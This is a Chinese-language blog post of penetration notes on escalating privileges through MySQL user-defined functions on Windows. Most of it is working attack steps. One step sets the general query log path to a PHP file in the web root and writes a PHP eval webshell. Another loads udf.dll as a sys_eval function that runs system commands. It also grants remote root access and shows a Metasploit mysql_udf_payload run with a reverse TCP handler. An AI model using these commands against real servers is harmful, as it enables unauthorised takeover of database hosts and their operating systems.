windows下udf提权的知识点梳理

于 2024-07-10 23:46:00 发布
阅读量263 收藏 4
点赞数 7
分类专栏: 提权笔记 文章标签: web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/140335747
版权

一、sql注入写shell和udf提权相关条件和命令

1、知道网站物理路径
2、高权限数据库用户(数据库的写)
3、load_file () 开启 即 secure_file_priv 无限制
4、网站路径有写入权限
请添加图片描述

日志文件写入webshell

Web 文件夹宽松权限可以写入
Windows 系统下
高权限运行 MySQL 或者 Apache
MySQL 5.0 版本以上会创建日志文件,可以通过修改日志的全局变量来 getshell,一般在有phpmyadmin下用这个方法。

SHOW VARIABLES LIKE 'general%';   #查询日志文件

请添加图片描述

# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='E:\\phpstudy_pro\\WWW\\shell2.php';

请添加图片描述

# 往日志里面写入 payload
select '<?php eval($_POST[1]);?>';

请添加图片描述

写入webshell后的操作

手写UDF提权。
MSF的UDF提权,需要远程登录或者代理。
上传有udf提权功能的马。

1、手写UDF提权。
将udf.dll文件写入到mysql的 E:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ 文件夹下。lib和plugin文件夹可用webshell或ADS创建这两个文件夹。

#完整命令在下面链接
https://www.sqlsec.com/udf/

请添加图片描述

#创建自定义函数并调用命令
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

导入成功后查看一下 mysql 函数里面是否新增了 sys_eval:
请添加图片描述

#执行命令
select sys_eval('whoami');

请添加图片描述

#删除自定义函数
drop function sys_eval;

2、MSF的UDF提权

#修改mysql允许远程登录,第一个root为用户,第二个为密码
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.200.5
rhosts => 192.168.200.5
msf6 exploit(multi/mysql/mysql_udf_payload) > set password root
password => root
msf6 exploit(multi/mysql/mysql_udf_payload) > run

[*] Started reverse TCP handler on 192.168.200.3:4444 
[*] 192.168.200.5:3306 - Checking target architecture...
[*] 192.168.200.5:3306 - Checking for sys_exec()...
[*] 192.168.200.5:3306 - Checking target architecture...
[*] 192.168.200.5:3306 - Checking for MySQL plugin directory...
[*] 192.168.200.5:3306 - Target arch (win64) and target path both okay.
[*] 192.168.200.5:3306 - Uploading lib_mysqludf_sys_64.dll library to E:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/SJPPUPaF.dll...
[*] 192.168.200.5:3306 - Checking for sys_exec()...
[*] 192.168.200.5:3306 - Command Stager progress -  55.47% done (1444/2603 bytes)
[*] 192.168.200.5:3306 - Command Stager progress - 100.00% done (2603/2603 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/mysql/mysql_udf_payload) >

然后和上述一样流程,使用dll文件创建函数,执行命令。

~王
关注
专栏目录
权限提权——Win提权漏洞及数据库&AT&SC&PS提权
m0_61506558的博客
10-12 669
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要提升自己的权限,就得在后台页面中寻找漏洞利用的点,成功上传webshell提升权限.(一)权限提升权限介绍​ 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。
2020大数据开发工程师知识点整理(更新)
Amo
08-15 1243
写在前面 博主今年在准备大数据工程师岗位的校招,整理了大数据相关的部分知识点,希望可以帮助和博主一样备战秋招大数据岗位的朋友,另外,博主正在准备 各大厂已经出来的面试题Q&A的整理,会在这两个星期内发出来,感兴趣的同学可以关注我哦~ 如果这篇博文在你面试的时候有帮助的话,欢迎回来还愿哦~ 目录 写在前面 java 1.请说明一下JAVA反射的实现...
Windows提权之mysql数据库提权(UDF提权)
mrx56的博客
03-31 3182
可通过sqlmap或者msf获取udf文件。
UDF提权
yumengzth的博客
07-23 2663
今天的这篇博客是mysql提权中的一种。 0x00 环境与前提 1. 本机搭建win7专业版虚拟环境 2. phpStudy 2018最新版本 3. 运行的版本是php-5.4.45-nts + IIS 4. mysql版本Ver 14.14 Distrib 5.5.53,for Win32 (AMD64) 5. win7 phpstudy中搭建帝国CMS,并拿到该网站的webshell 环境...
mysql udf 初始化_mysql数据库udf提权
weixin_26905423的博客
02-27 186
文章来源:疯猫网络mysql数据库udf提权UDF (user defined function),即用户自定义函数。通过添加新函数,对MySQL数据库的功能进行扩充,就像使用本地MySQL函数如 database() 或 version()一样。mysql数据库udf提权步骤1. 在mysql>5.1版本,udf.dll应放置在mysql安装目录的lib\plugin下。在mysql&l...
windwos下mysql的udf提权
最新发布
weixin_45653478的博客
07-10 1087
UDF(User Defined Functions)即用户自定义函数,通过这种方式可以实现命令执行,其原理是通过lib_mysqludf_sys提供的函数可以执行系统命令 攻击场景:同之前利用日志写WebShell的场景,即堆叠注入或MySQL终端权限或类似phpMyAdmin数据库管理工具后台权限等。
linux下 udf提权_Windows 下的提权大合集
weixin_39529443的博客
12-13 94
文章来源:HACK学习呀Windows 下的提权大合集项目地址:https://github.com/lyshark/Windows-exploitsWindows平台提权漏洞集合项目地址:https://github.com/SecWiki/windows-kernel-exploits各大平台提权工具项目地址:https://github.com/klsfct/getshellWin...
DVWA windows提权
a1371688168的博客
07-22 1305
DVWA windows提权
awesome-AutoIt:精选的UDF精选清单,示例脚本,工具以及AutoIt的有用资源
01-31
下面,我们将深入探讨这些关键知识点。 1. **AutoIt基础**: AutoIt是一种简单的脚本语言,适用于快速编写小到中型的自动化脚本。它的语法简洁,易于学习,特别适合没有编程背景的用户。主要功能包括模拟键盘和...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5530
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
权限提升-数据库提权-MSF-UDF提权
xiaoheizi的博客
08-28 974
在MySQL 5.1版本及以后的环境下,udf提权时需要将udf.dll导出到mysql安装目录\lib\plugin\目录下。不同的操作系统,不同的版本,提权时导出udf.dll存放的目录不一样。//创建函数绑定dll。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。2、当secure_file_priv 的值为 c:/ ,表示限制 mysqld 的导入|导出只能发生在c盘目录下,无法进行提权
你真的会udf提权???数据库权限到系统权限 内网学习 mysql的udf提权操作 ??msf你会用了吗???
helloKittywz的博客
07-01 868
我们的udf提权和反弹shell提权是类似的,反弹shell就是直接执行命令来建立这些操作,命令是写好了的通过编码进行操作的,也是创建dll文件。与udf提权是类似的。在实际的提权操作还有很多妨碍我们的,我们会遇见很多的,导致提权不成功的操作。mysql的udf提权前提:1:要有数据库密码和账号2:secure-file-priv=空或者写入的路径各个好是我们要写的地方。
Mysql提权方法总结系列-UDF提权
kracer的博客
02-27 2654
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权。 1、条件判断 ① ...
【数据库提权】MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 2033
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
windows内网本地用户提权
qq_49714982的博客
04-09 592
1.有当前计算机的web权限,建立在web权限取得的情况下进行的权限提升2.符合的操作系统3.符合的溢出漏洞。
MySQL UDF提权执行系统命令
yggcwhat
05-04 948
MySQL UDF提权执行系统命令
【SQL注入】UDF提权命令执行
孤桜懶契
08-15 4248
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写 二、udf在渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
[WEB安全]MySQl提权 mof、udf过程详解
网络安全知识分享
12-17 3235
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
SQLmap命令详解:利用udf提权与MSSQL获取shell
2. **利用lib_mysqludf_sys.dll进行MSSQL提权**:在MSSQL环境中,可以将`lib_mysqludf_sys.dll`上传到MySQL的插件目录,并创建`sys_exec`和`sys_eval`函数来执行操作系统命令。 3. **执行命令**:使用`sys_eval`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值